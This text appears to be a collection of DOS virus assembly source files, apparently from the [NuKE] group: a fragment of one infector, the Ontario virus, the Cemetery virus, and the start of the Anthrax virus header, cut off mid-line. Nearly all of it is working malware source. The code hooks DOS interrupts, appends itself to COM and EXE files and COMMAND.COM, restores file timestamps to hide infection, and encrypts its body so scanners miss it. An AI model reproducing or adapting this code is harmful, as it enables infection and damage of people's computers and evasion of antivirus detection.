files read mov ah,40 ; pushf ; call cs:stdint21 ; write in end of file ret mod_8_cont_end: mov ax,5701 ; mov cx,cs:ftime ; mov dx,cs:fdate ; restore file date/time pushf ; call cs:oldint21 ; inc cs:files cmp cs:files,0a jne mod_8_ext call word ptr cs:[table+8] jmp short mod_8_ext mod_8_exit: stc jmp short mod_8_ex mod_8_ext: clc mod_8_ex: pop bp pop di pop es pop ds pop dx pop cx ret ;--------------------------------------------------------------- myend db 0 int 20 ;code of infected file false_mod_1: mov word ptr cs:[table],offset mod_1 ret code ends end start done virus segment byte public assume cs:virus, ds:virus org 100h ;Guess its a COM File huh? ont proc far start: jmp go4it ;Jump to beginning of the db 1Dh ;Virus And start! db 'fected [NuKE]''92', 0Dh, 0Ah, '$' mov dx,0102h ;This is the small File the Virus mov ah,09h ;is infected to! As you see it only int 21h ;displays that messages and exits int 20h ;Exit Command for COMs go4it: nop call decrypt ;Get Decryption value & Decrypt viri call virus_start ;Start the Virus! ont endp ;---------------------------------------------------------------------; ; The Start of the Virus Code ; ;---------------------------------------------------------------------; virus_start proc near pop bp sub bp,7 mov ax,0FFFFh ;Is Virus in Memory hooked on? int 21h ;the Int 21h? or ah,ah ; jz bye_bye ;Yes it is... Quit then... push ds xor ax,ax mov ds,ax sub word ptr ds:413h,2 lds bx,dword ptr ds:84h mov word ptr cs:[200h][bp],bx mov word ptr cs:[202h][bp],ds mov bx,es dec bx mov ds,bx sub word ptr ds:3,80h mov ax,ds:12h sub ax,80h mov ds:12h,ax mov es,ax push cs pop ds mov si,bp xor di,di mov cx,204h cld rep movsb mov ds,cx cli ;This is where we hook the mov word ptr ds:84h,7Fh ;virus to the Int21h mov word ptr ds:84h+2,ax sti mov ax,4BFFh int 21h pop ds push ds pop es bye_bye: or bp,bp jz what lea si,[bp+7Bh] nop mov di,offset ds:[100h] push di cld movsw movsw retn what: mov ax,es add cs:7dh,ax ;* jmp far ptr go4it7 virus_start endp db 0EAh,0EBh, 15h, 49h, 6Eh cmp ax,0FFFFh jne new_21h inc ax iret ;---------------------------------------------------------------------; ; Interrupt 21h handler ; ;---------------------------------------------------------------------; new_21h: cmp ah,4Bh ;Test, is File beginning Executed! jne leave_ok ;Nope! Call Int21! cmp al,3 ;Overlay, beginning execute? je leave_ok ;Yes! Leave it alone cmp al,0FFh ;Virus testing to see if its alive? jne do_it_man ;in memory? push cs pop ds mov dx,1DDh call infect iret do_it_man: call infect ;Infect file dude... leave_ok: jmp dword ptr cs:[200h] ;Int21 handler.. ;---------------------------------------------------------------------; ; Infection Routine for the Ontario Virus ; ;---------------------------------------------------------------------; infect proc near push es push ds ;Save them not to fuck things up.. push dx push cx push bx push ax mov ax,4300h ;Here we get the file attribute call int21 ;for file to be infected. jc outta ;Bitch Error encountered. Quit! test cl,1 ;Test if its Read-Only! jz attrib_ok ;Ok, it ain't Read-Only Continue! and cl,0FEh ;Set Read-Only to normal Attribs mov ax,4301h ;Call Ints to do it... call int21 ;Bingo! Done! jc outta ;Error encountered? Split if yes! attrib_ok: mov ax,3D02h ;Open file for Read/Write call int21 ;Call Interrupt to do it! jnc open_ok ;no errors? Continue! outta: jmp go4it5 ;Hey, Split Man... Errors happened! open_ok: mov bx,ax ;BX=File Handle push cs pop ds mov ax,5700h ;Get File's Date & Time call int21 ;Do it! mov word ptr ds:[204h],cx ;Save Time mov word ptr ds:[206h],dx ;Save Date mov dx,208h ;DX=Pointer mov cx,1Bh ;CX=Number of Btyes mov ah,3Fh ;Read From File call int21 ;Do It! jc go4it1 ;Errors? Quit if yes! cmp word ptr ds:[208h],5A4Dh ;Check if files already je go4it0 ;infected. mov al,byte ptr ds:[209h] ;Com , Exes... cmp al,byte ptr ds:[20Bh] je go4it1 xor dx,dx xor cx,cx mov ax,4202h call int21 ;Move File pointer to end of jc go4it1 ;file to be infected. cmp ax,0E000h ;File bigger than E000 bytes? ja go4it1 ;Error... push ax ;Save File Length mov ax,word ptr ds:[208h] mov ds:7bh,ax mov ax,word ptr ds:[20Ah] mov ds:7dh,ax pop ax ;All this is, is a complex sub ax,3 ;way to do "JMP" mov byte ptr ds:[208h],0E9h ; mov word ptr ds:[209h],ax mov byte ptr ds:[20Bh],al jmp short go4it3 ;File READY Infect it! db 90h ;NOP me... detection string? go4it0: cmp word ptr ds:[21Ch],1 jne go4it2 go4it1: jmp go4it4 go4it2: mov ax,word ptr ds:[20Ch] mov cx,200h mul cx push ax push dx mov cl,4 ror dx,cl shr ax,cl add ax,dx sub ax,word ptr ds:[210h] push ax mov ax,word ptr ds:[21Ch] mov ds:7bh,ax mov ax,word ptr ds:[21Eh] add ax,10h mov ds:7dh,ax pop ax ; This is continues with the mov word ptr ds:[21Eh],ax ; above to put a JMP at the mov word ptr ds:[21Ch],1 ; beginning of the file! inc word ptr ds:[20Ch] ; pop cx ; pop dx ; mov ax,4200h ; call int21 jc go4it4 go4it3: xor byte ptr ds:[1F8h],8 ; xor ax,ax ; Theses Lines copy the mov ds,ax ; virus code else where mov al,ds:46Ch ; in memory to get it push cs ; ready to infect the file pop ds ; as we must encrypt it push cs ; FIRST when we infect the pop es ; file. so we'll encrypt mov byte ptr ds:[1ECh],al ; this copy we're making! xor si,si ; and append that to the mov di,offset ds:[224h] ; end of the file push di ; mov cx,200h ; cld ; rep movsb mov si,offset ds:[228h] ;Now Encrpyt that copy of the call encrypt_decrypt ;virus we just made... pop dx mov cx,200h ;Write Virus to file! mov ah,40h ;BX=Handle, CX=Bytes call int21 ;DX=pointer to write buffer jc go4it4 ;Duh? Check for errors! xor cx,cx xor dx,dx ;Now move pointer to beginning mov ax,4200h ;of file. call int21 jc go4it4 ;Duh? Check for errors! mov dx,208h ;Write to file! mov cx,1Bh ;CX=Bytes mov ah,40h ;DX=pointes to buffer call int21 ;Bah, HumBug go4it4: mov dx,word ptr ds:[206h] ;Leave no tracks... mov cx,word ptr ds:[204h] ; puts back File TIME mov ax,5701h ; and DATE! on file... call int21 ; mov ah,3Eh ; call int21 ;Bah, HumBug... go4it5: pop ax ;Get lost... pop bx pop cx pop dx pop ds pop es retn infect endp ;----------------------------------------------------------------------; ; The Original Interrupt 21h handler ; ;----------------------------------------------------------------------; int21 proc near pushf ;Fake an Int Call... call dword ptr cs:[200h] ;Orignal Int21h Handler retn int21 endp db 'C:\COMMAND.COM' db 00h, 84h ;---------------------------------------------------------------------; ; The Simple, But VERY Effective Encryption Routine ; ;---------------------------------------------------------------------; decrypt proc near pop si push si mov al,byte ptr cs:[1E8h][si];INCRYPTION VALUE TO CHANGE! encrypt_decrypt: ;and Virus will be UNDETECTABLE mov cx,1E8h ; LENGTH OF VIRII! Change this! loop_me: not al ; if you modief the virus! xor cs:[si],al ; inc si ; loop loop_me ; ; retn decrypt endp virus ends end start ;------------------------------------------------------------------------ done ;██████████████████████████████████████████████████████████████████████████ ;██ ██ ;██ CEMETERY ██ ;██ ██ ;██ Created: 4-Mar-91 ██ ;██ ██ ;██████████████████████████████████████████████████████████████████████████ data_1e equ 4Ch ; (0000:004C=31h) data_2e equ 4Eh ; (0000:004E=70h) data_3e equ 70h ; (0000:0070=0FF33h) data_4e equ 72h ; (0000:0072=0F000h) data_5e equ 84h ; (0000:0084=0E3h) data_6e equ 86h ; (0000:0086=161Ah) data_7e equ 90h ; (0000:0090=8Eh) data_8e equ 92h ; (0000:0092=1498h) data_9e equ 102h ; (0000:0102=0CC00h) data_10e equ 106h ; (0000:0106=326h) data_11e equ 450h ; (0000:0450=184Fh) data_12e equ 46Ch ; (0000:046C=0C4BCh) data_13e equ 46Eh ; (0000:046E=10h) data_14e equ 47Bh ; (0000:047B=0) data_15e equ 0 ; (0326:0000=6A7h) data_16e equ 2 ; (0326:0002=70h) data_17e equ 0 ; (0687:0000=81h) data_18e equ 1 ; (0688:0001=0FF17h) data_19e equ 2 ; (06E3:0002=2342h) data_20e equ 6 ; (06E3:0006=2344h) data_46e equ 0FBF0h ; (701E:FBF0=0) data_47e equ 0FBF2h ; (701E:FBF2=0) data_48e equ 0FC10h ; (701E:FC10=0) data_49e equ 0FC12h ; (701E:FC12=0) data_50e equ 0FC14h ; (701E:FC14=0) data_51e equ 0FC1Eh ; (701E:FC1E=0) data_52e equ 0FC20h ; (701E:FC20=0) data_53e equ 0FC26h ; (701E:FC26=0) data_54e equ 0FC28h ; (701E:FC28=0) code_seg_a segment assume cs:code_seg_a, ds:code_seg_a org 100h cemetery proc far start: data_21 dw 0CE9h data_22 dw 0C304h db 23 dup (0C3h) db 'CEMETERY' data_24 dw 0C3C3h data_25 dw 0C3C3h data_26 dw 0 data_27 dw 0 data_28 dw 0 data_29 dw 0 data_30 dw 0 data_31 dd 00000h data_32 dw 0 data_33 dw 0 data_34 dd 00000h data_35 dw 0 data_36 dw 0 db 68h, 0E8h, 55h, 3, 90h, 3Dh db 4Dh, 4Bh, 75h, 9, 55h, 8Bh db 0ECh, 83h, 66h, 6, 0FEh, 5Dh db 0CFh, 80h, 0FCh, 4Bh, 74h, 12h db 3Dh, 0, 3Dh, 74h, 0Dh, 3Dh db 0, 6Ch, 75h, 5, 80h, 0FBh db 0, 74h, 3 loc_1: jmp loc_13 loc_2: push es push ds push di push si push bp push dx push cx push bx push ax call sub_6 call sub_7 cmp ax,6C00h jne loc_3 ; Jump if not equal mov dx,si loc_3: mov cx,80h mov si,dx locloop_4: inc si mov al,[si] or al,al ; Zero ? loopnz locloop_4 ; Loop if zf=0, cx>0 sub si,2 cmp word ptr [si],4D4Fh je loc_7 ; Jump if equal cmp word ptr [si],4558h je loc_6 ; Jump if equal loc_5: jmp short loc_12 db 90h loc_6: cmp word ptr [si-2],452Eh nop jz loc_8 ; Jump if zero jmp short loc_5 loc_7: cmp word ptr [si-2],432Eh jne loc_5 ; Jump if not equal cmp word ptr [si-4],444Eh jne loc_5 ; Jump if not equal loc_8: mov ax,3D02h call sub_5 jc loc_12 ; Jump if carry Set mov bx,ax mov ax,5700h call sub_5 mov cs:data_27,cx ; (701E:0129=0) mov cs:data_28,dx ; (701E:012B=0) mov ax,4200h xor cx,cx ; Zero register xor dx,dx ; Zero register call sub_5 push cs pop ds mov dx,103h mov si,dx mov cx,18h mov ah,3Fh ; '?' call sub_5 jc loc_10 ; Jump if carry Set cmp word ptr [si],5A4Dh jne loc_9 ; Jump if not equal call sub_1 jmp short loc_10 loc_9: call sub_4 loc_10: jc loc_11 ; Jump if carry Set mov ax,5701h mov cx,cs:data_27 ; (701E:0129=0) mov dx,cs:data_28 ; (701E:012B=0) call sub_5 loc_11: mov ah,3Eh ; '>' call sub_5 loc_12: call sub_7 pop ax pop bx pop cx pop dx pop bp pop si pop di pop ds pop es loc_13: jmp cs:data_31 ; (701E:0131=0) cemetery endp ;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ ; SUBROUTINE ;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ sub_1 proc near mov cx,[si+16h] add cx,[si+8] mov ax,10h mul cx ; dx:ax = reg * ax add ax,[si+14h] adc dx,0 push dx push ax mov ax,4202h xor cx,cx ; Zero register xor dx,dx ; Zero register call sub_5 cmp dx,0 jne loc_14 ; Jump if not equal cmp ax,589h jae loc_14 ; Jump if above or = pop ax pop dx stc ; Set carry flag ret loc_14: mov di,ax mov bp,dx pop cx sub ax,cx pop cx sbb dx,cx cmp word ptr [si+0Ch],0 je loc_ret_17 ; Jump if equal cmp dx,0 jne loc_15 ; Jump if not equal cmp ax,589h jne loc_15 ; Jump if not equal stc ; Set carry flag ret loc_15: mov dx,bp mov ax,di push dx push ax add ax,589h adc dx,0 mov cx,200h div cx ; ax,dx rem=dx:ax/reg les di,dword ptr [si+2] ; Load 32 bit ptr mov cs:data_29,di ; (701E:012D=0) mov cs:data_30,es ; (701E:012F=0) mov [si+2],dx cmp dx,0 je loc_16 ; Jump if equal inc ax loc_16: mov [si+4],ax pop ax pop dx call sub_2 sub ax,[si+8] les di,dword ptr [si+14h] ; Load 32 bit ptr mov data_24,di ; (701E:0123=0C3C3h) mov data_25,es ; (701E:0125=0C3C3h) mov [si+14h],dx mov [si+16h],ax mov word ptr data_26,ax ; (701E:0127=0) mov ax,4202h xor cx,cx ; Zero register xor dx,dx ; Zero register call sub_5 call sub_3 jc loc_ret_17 ; Jump if carry Set mov ax,4200h xor cx,cx ; Zero register xor dx,dx ; Zero register call sub_5 mov ah,40h ; '@' mov dx,si mov cx,18h call sub_5 loc_ret_17: ret sub_1 endp ;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ ; SUBROUTINE ;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ sub_2 proc near mov cx,4 mov di,ax and di,0Fh locloop_18: shr dx,1 ; Shift w/zeros fill rcr ax,1 ; Rotate thru carry loop locloop_18 ; Loop if cx > 0 mov dx,di ret sub_2 endp ;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ ; SUBROUTINE ;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ sub_3 proc near mov ah,40h ; '@' mov cx,589h mov dx,100h call sub_6 jmp short loc_22 db 90h ;▀▀▀▀ External Entry into Subroutine ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ sub_4: mov ax,4202h xor cx,cx ; Zero register xor dx,dx ; Zero register call sub_5 cmp ax,589h jb loc_ret_21 ; Jump if below cmp ax,0FA00h jae loc_ret_21 ; Jump if above or = push ax cmp byte ptr [si],0E9h jne loc_19 ; Jump if not equal sub ax,58Ch cmp ax,[si+1] jne loc_19 ; Jump if not equal pop ax stc ; Set carry flag ret loc_19: call sub_3 jnc loc_20 ; Jump if carry=0 pop ax ret loc_20: mov ax,4200h xor cx,cx ; Zero register xor dx,dx ; Zero register call sub_5 pop ax sub ax,3 mov dx,123h mov si,dx mov byte ptr cs:[si],0E9h mov cs:[si+1],ax mov ah,40h ; '@' mov cx,3 call sub_5 loc_ret_21: ret sub_3 endp ;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ ; SUBROUTINE ;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ sub_5 proc near loc_22: pushf ; Push flags call cs:data_31 ; (701E:0131=0) ret sub_5 endp ;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ ; SUBROUTINE ;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ sub_6 proc near push ax push ds push es xor ax,ax ; Zero register push ax pop ds cli ; Disable interrupts les ax,dword ptr ds:data_7e ; (0000:0090=18Eh) Load 32 bit ptr mov cs:data_32,ax ; (701E:0135=0) mov cs:data_33,es ; (701E:0137=0) mov ax,3ABh mov ds:data_7e,ax ; (0000:0090=18Eh) mov ds:data_8e,cs ; (0000:0092=1498h) les ax,dword ptr ds:data_1e ; (0000:004C=831h) Load 32 bit ptr mov cs:data_35,ax ; (701E:013D=0) mov cs:data_36,es ; (701E:013F=0) les ax,cs:data_34 ; (701E:0139=0) Load 32 bit ptr mov ds:data_1e,ax ; (0000:004C=831h) mov ds:data_2e,es ; (0000:004E=70h) sti ; Enable interrupts pop es pop ds pop ax ret sub_6 endp ;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ ; SUBROUTINE ;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ sub_7 proc near push ax push ds push es xor ax,ax ; Zero register push ax pop ds cli ; Disable interrupts les ax,dword ptr cs:data_32 ; (701E:0135=0) Load 32 bit ptr mov ds:data_7e,ax ; (0000:0090=18Eh) mov ds:data_8e,es ; (0000:0092=1498h) les ax,dword ptr cs:data_35 ; (701E:013D=0) Load 32 bit ptr mov ds:data_1e,ax ; (0000:004C=831h) mov ds:data_2e,es ; (0000:004E=70h) sti ; Enable interrupts pop es pop ds pop ax ret sub_7 endp db 0B0h, 3, 0CFh, 50h, 53h, 51h db 2Eh, 0A3h, 0FEh, 3, 2Eh, 0A1h db 0F7h, 3, 0A3h, 50h, 4, 2Eh db 0A1h, 0F5h, 3, 8Ah, 0DCh, 0B4h db 9, 0B9h, 1, 0, 0CDh, 10h db 0E8h, 34h, 0, 0E8h, 0B7h, 0 db 2Eh, 0A1h, 0F7h, 3, 0A3h, 50h db 4, 0B3h, 7, 0B8h, 7, 9 db 0B9h, 1, 0, 0CDh, 10h, 2Eh db 0A1h, 0FEh, 3, 0A3h, 50h, 4 db 7, 1Fh db ']_^ZY[X.' db 0FFh, 2Eh, 0FAh, 3 data_37 dw 0 data_38 db 10h data_39 db 10h data_40 db 0 data_41 dw 0 data_42 dw 0 db 0, 0, 2Eh, 0A1h, 0F7h, 3 db 8Bh, 1Eh, 4Ah, 4, 4Bh, 2Eh db 0F6h, 6, 0F9h, 3, 1, 74h db 0Ch, 3Ah, 0C3h, 72h, 12h, 2Eh db 80h, 36h, 0F9h, 3, 1, 0EBh db 0Ah loc_23: cmp al,0 jg loc_24 ; Jump if > xor byte ptr cs:data_40,1 ; (701E:03F9=0) loc_24: test byte ptr cs:data_40,2 ; (701E:03F9=0) jz loc_25 ; Jump if zero cmp ah,18h jb loc_26 ; Jump if below xor byte ptr cs:data_40,2 ; (701E:03F9=0) jmp short loc_26 loc_25: cmp ah,0 jg loc_26 ; Jump if > xor byte ptr cs:data_40,2 ; (701E:03F9=0) loc_26: cmp byte ptr cs:data_37,20h ; (701E:03F5=0) ' ' je loc_27 ; Jump if equal db 2Eh data_44 dw 3E80h db 0F8h, 3, 0, 74h, 6, 2Eh db 80h, 36h, 0F9h, 3, 2 loc_27: test byte ptr cs:data_40,1 ; (701E:03F9=0) jz loc_28 ; Jump if zero inc cs:data_38 ; (701E:03F7=10h) jmp short loc_29 loc_28: dec cs:data_38 ; (701E:03F7=10h) loc_29: test byte ptr cs:data_40,2 ; (701E:03F9=0) jz loc_30 ; Jump if zero inc cs:data_39 ; (701E:03F8=10h) jmp short loc_ret_31 loc_30: dec cs:data_39 ; (701E:03F8=10h) loc_ret_31: ret ;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ ; SUBROUTINE ;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ sub_8 proc near mov ax,word ptr cs:data_38 ; (701E:03F7=1010h) mov ds:data_11e,ax ; (0000:0450=184Fh) mov bh,data_55 ; (0000:0462=0D400h) mov ah,8 int 10h ; Video display ah=functn 08h ; get char al & attrib ah @curs mov cs:data_37,ax ; (701E:03F5=0) ret sub_8 endp db 50h, 53h, 51h, 52h, 56h, 57h db 55h, 1Eh, 6, 33h, 0C0h, 50h db 1Fh, 81h, 3Eh, 70h, 0, 0AEh db 3, 74h, 35h, 0A1h, 6Ch, 4 db 8Bh, 16h, 6Eh, 4, 0B9h, 0FFh db 0FFh, 0F7h, 0F1h, 3Dh, 10h, 0 db 75h, 24h, 0FAh, 8Bh, 2Eh, 50h db 4, 0E8h, 0BEh, 0FFh, 89h, 2Eh db 50h, 4, 0C4h, 6, 70h, 0 db 2Eh, 0A3h, 0FAh, 3, 2Eh, 8Ch db 6, 0FCh, 3, 0C7h, 6, 70h db 0, 0AEh, 3, 8Ch, 0Eh, 72h db 0, 0FBh loc_32: mov ah,2 int 14h ; RS-232 dx=com1, ah=func 02h ; get char al, ah=return status cmp al,31h ; '1' je loc_33 ; Jump if equal jnz loc_34 ; Jump if not zero loc_33: int 19h ; Bootstrap loader loc_34: pop es pop ds pop bp pop di pop si pop dx pop cx pop bx pop ax ret ;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ ; SUBROUTINE ;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ sub_9 proc near mov dx,10h mul dx ; dx:ax = reg * ax ret sub_9 endp ;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ ; SUBROUTINE ;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ sub_10 proc near xor ax,ax ; Zero register xor bx,bx ; Zero register xor cx,cx ; Zero register xor dx,dx ; Zero register xor si,si ; Zero register xor di,di ; Zero register xor bp,bp ; Zero register ret sub_10 endp db 1Eh, 0E8h, 0, 0 ;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ ; SUBROUTINE ;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ sub_11 proc near mov ax,4B4Dh int 21h ; DOS Services ah=function 4Bh ; run progm @ds:dx, parm @es:bx jc loc_35 ; Jump if carry Set jmp loc_45 loc_35: pop si push si mov di,si xor ax,ax ; Zero register push ax pop ds les ax,dword ptr ds:data_1e ; (0000:004C=831h) Load 32 bit ptr mov cs:data_53e[si],ax ; (701E:FC26=0) mov cs:data_54e[si],es ; (701E:FC28=0) les bx,dword ptr ds:data_5e ; (0000:0084=6E3h) Load 32 bit ptr mov cs:data_51e[di],bx ; (701E:FC1E=0) mov cs:data_52e[di],es ; (701E:FC20=0) mov ax,ds:data_9e ; (0000:0102=0CC00h) cmp ax,0F000h jne loc_43 ; Jump if not equal mov dl,80h mov ax,ds:data_10e ; (0000:0106=326h) cmp ax,0F000h je loc_36 ; Jump if equal cmp ah,0C8h jb loc_43 ; Jump if below cmp ah,0F4h jae loc_43 ; Jump if above or = test al,7Fh jnz loc_43 ; Jump if not zero mov ds,ax cmp word ptr ds:data_15e,0AA55h ; (0326:0000=6A7h) jne loc_43 ; Jump if not equal mov dl,ds:data_16e ; (0326:0002=70h) loc_36: mov ds,ax xor dh,dh ; Zero register mov cl,9 shl dx,cl ; Shift w/zeros fill mov cx,dx xor si,si ; Zero register locloop_37: lodsw ; String [si] to ax cmp ax,0FA80h jne loc_38 ; Jump if not equal lodsw ; String [si] to ax cmp ax,7380h je loc_39 ; Jump if equal jnz loc_40 ; Jump if not zero loc_38: cmp ax,0C2F6h jne loc_41 ; Jump if not equal lodsw ; String [si] to ax cmp ax,7580h jne loc_40 ; Jump if not equal loc_39: inc si lodsw ; String [si] to ax cmp ax,40CDh je loc_42 ; Jump if equal sub si,3 loc_40: dec si dec si loc_41: dec si loop locloop_37 ; Loop if cx > 0 jmp short loc_43 loc_42: sub si,7 mov cs:data_53e[di],si ; (701E:FC26=0) mov cs:data_54e[di],ds ; (701E:FC28=0) loc_43: mov ah,62h ; 'b' int 21h ; DOS Services ah=function 62h ; get progrm seg prefix addr bx mov es,bx mov ah,49h ; 'I' int 21h ; DOS Services ah=function 49h ; release memory block, es=seg mov bx,0FFFFh mov ah,48h ; 'H' int 21h ; DOS Services ah=function 48h ; allocate memory, bx=bytes/16 sub bx,5Ah nop jc loc_45 ; Jump if carry Set mov cx,es stc ; Set carry flag adc cx,bx mov ah,4Ah ; 'J' int 21h ; DOS Services ah=function 4Ah ; change mem allocation, bx=siz mov bx,59h stc ; Set carry flag sbb es:data_19e,bx ; (06E3:0002=2342h) push es mov es,cx mov ah,4Ah ; 'J' int 21h ; DOS Services ah=function 4Ah ; change mem allocation, bx=siz mov ax,es dec ax mov ds,ax mov word ptr ds:data_18e,8 ; (0688:0001=0FF17h) call sub_9 mov bx,ax mov cx,dx pop ds mov ax,ds call sub_9 add ax,ds:data_20e ; (06E3:0006=2344h) adc dx,0 sub ax,bx sbb dx,cx jc loc_44 ; Jump if carry Set sub ds:data_20e,ax ; (06E3:0006=2344h) loc_44: mov si,di xor di,di ; Zero register push cs pop ds sub si,413h mov cx,589h inc cx rep movsb ; Rep while cx>0 Mov [si] to es:[di] mov ah,62h ; 'b' int 21h ; DOS Services ah=function 62h ; get progrm seg prefix addr bx dec bx mov ds,bx mov byte ptr ds:data_17e,5Ah ; (0687:0000=81h) 'Z' mov dx,142h xor ax,ax ; Zero register push ax pop ds mov ax,es sub ax,10h mov es,ax cli ; Disable interrupts mov ds:data_5e,dx ; (0000:0084=6E3h) mov ds:data_6e,es ; (0000:0086=161Ah) sti ; Enable interrupts dec byte ptr ds:data_14e ; (0000:047B=0) loc_45: pop si cmp word ptr cs:data_46e[si],5A4Dh ; (701E:FBF0=0) jne loc_46 ; Jump if not equal pop ds mov ax,cs:data_50e[si] ; (701E:FC14=0) mov bx,cs:data_49e[si] ; (701E:FC12=0) push cs pop cx sub cx,ax add cx,bx push cx push word ptr cs:data_48e[si] ; (701E:FC10=0) push ds pop es call sub_10 ret ; Return far loc_46: pop ax mov ax,cs:data_46e[si] ; (701E:FBF0=0) mov cs:data_21,ax ; (701E:0100=0CE9h) mov ax,cs:data_47e[si] ; (701E:FBF2=0) mov cs:data_22,ax ; (701E:0102=0C304h) mov ax,100h push ax push cs pop ds push ds pop es call sub_10 ret sub_11 endp code_seg_a ends end start done ;************************************************************************** ;** ANTHRAX VIRUS ** ;** Created: 2 Jan 90 Programmer: (c) Damage, Inc. ** ;** [NukE] Notes: Another Stealth Type of Virus! and this one is Detected** ;** by Scan (McAfee & Assc.) And does copy itself to *.COM ** ;** *.EXE and the Command.Com and is Memory Resident! ** ;** ** ;** Sources brought to you by -> Rock Steady [NukE]s Head Programmer! ** ;** ** ;************************************************************************** .286p DATA_1E EQU 46CH ; (0000:046C=2DH) DATA_2E EQU 4 ; (65AC:0004=0) DATA_3E EQU 7 ; (65AC:0007=0) DATA_10E EQU 5FEH ; (65AC:05FE=0) SEG_A SEGMENT BYTE 